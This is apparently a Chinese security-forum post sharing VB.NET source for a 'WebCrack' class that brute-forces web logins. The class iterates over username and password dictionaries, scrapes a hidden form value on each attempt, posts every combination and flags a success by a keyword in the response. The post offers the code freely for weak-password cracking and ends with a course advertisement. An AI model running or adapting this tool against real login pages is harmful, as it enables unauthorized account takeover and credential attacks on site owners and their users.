用处不大 因此 也就没再继续弄多线程 跑跑弱密码吧 多线程和异步经常出错 同时 要正确反映出是否成功登录 需要判断关键字 即成功关键字和失败关键字 什么状态码的以前那种 十分扯淡
本示例程序 使用补充域 来加载hind域或一些一般验证码 图片验证码没加类库支持 自行添加
不废话 上dll 注释可能没有 可自由修改和调用 不用署名 贴
Imports MSXML2
Imports System.Net
''' <summary>
''' web的暴力破解,输入url、用户名name、密码name、用户名字典、密码字典、补充域、补充域的偏移(起始与长度)、关键词、关键词类型
''' 多进程/多线程 并发优化?
''' author:kn1ghtc
''' </summary>
''' <remarks></remarks>
Public Class WebCrack
Dim lxmlHttp As New XMLHTTP60
Dim lxmlHttpGetParameter As New XMLHTTP60
Public Function SynchronizationBrute(ByVal url As String, ByVal username As String, ByVal password As String, ByVal user() As String, ByVal pass() As String, ByVal HindValue As String, ByVal i As Integer, ByVal n As Integer, ByVal Keyword As String, ByVal Ktype As Integer)
Dim SuccessStr As String = ""
Dim success_user As String = ""
Dim success_pass As String = ""
Dim ParameterStr As String = ""
For k = 0 To user.Length - 1
For c = 0 To pass.Length - 1
success_user = user(k)
success_pass = pass(c)
' lxmlHttpGetParameter.onreadystatechange = AsynResponseGetParameter()
lxmlHttpGetParameter.open("GET", url, False)
lxmlHttpGetParameter.setRequestHeader(HttpRequestHeader.IfModifiedSince.ToString, "0")
lxmlHttpGetParameter.send()
Dim remoteConte As String = ""
Dim ih As Integer
If lxmlHttpGetParameter.readyState = 4 Then
remoteConte = lxmlHttpGetParameter.responseText
ih = remoteConte.IndexOf(HindValue)
If Not ih = 0 Then
ParameterStr = Mid(remoteConte, ih + i, n)
End If
End If
Dim string_url As String = url + "?" + username + "=" + success_user + "&" + _
password + "=" + success_pass + "&" + HindValue + _
"=" + ParameterStr
' lxmlHttp.onreadystatechange = AsynResponseVerifyValue()
lxmlHttp.open("POST", string_url, False)
lxmlHttp.send()
If lxmlHttp.readyState = 4 Then
If lxmlHttp.status = 200 And lxmlHttp.responseText.Contains(Keyword) Then
SuccessStr += "200 " + username + ":= " + success_user + " " + password + ":= " + success_pass + vbCrLf
End If
End If
Next
Next
Return SuccessStr
End Function
End Class
[课程]Android-CTF解题方法汇总!
